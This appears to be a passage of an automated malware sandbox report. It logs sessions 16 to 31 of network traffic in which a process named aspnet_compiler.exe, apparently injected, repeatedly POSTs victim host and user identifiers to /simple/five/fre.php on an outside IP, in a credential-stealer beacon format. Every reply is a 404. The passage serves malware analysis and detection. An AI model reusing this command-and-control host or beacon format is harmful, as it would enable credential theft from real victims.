                                                                                                                    Nov 15, 2024 18:14:47.565743923 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:48.529079914 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:48 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.54984594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:48.727335930 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:48.732748032 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:49.701478958 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:49 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.54985194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:49.861510992 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:49.866642952 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:50.823755026 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:50 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.54985694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:51.010651112 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:51.015683889 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:51.958895922 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:51 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.54986294.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:52.111242056 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:52.116189003 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:53.063715935 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:52 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.54986994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:53.226959944 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:53.231993914 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:54.207930088 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:54 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.54987594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:54.408966064 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:54.415832996 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:55.402070999 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:55 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.54988094.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:55.562556982 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:55.567481041 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:56.541213036 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:56 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.54988594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:56.692954063 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:56.697887897 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:57.675513029 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:57 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.54988994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:57.883132935 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:57.888076067 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:59.316334963 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:59 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.54989794.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:59.473073006 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:59.477956057 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:00.437112093 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:00 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.54990194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:00.617867947 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:00.622720003 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:01.556570053 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:01 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.54990594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:01.711424112 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:01.716470003 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:02.676476955 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:02 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.54990994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:02.838454962 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:02.843350887 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:03.786936998 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:03 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.54991594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:03.939058065 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:03.944044113 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:04.910248995 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:04 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.54992094.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:05.074208021 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:05.079129934 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:06.064785957 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:05 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.54992594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:06.227369070 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:06.232263088 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:07.206125021 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:07 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
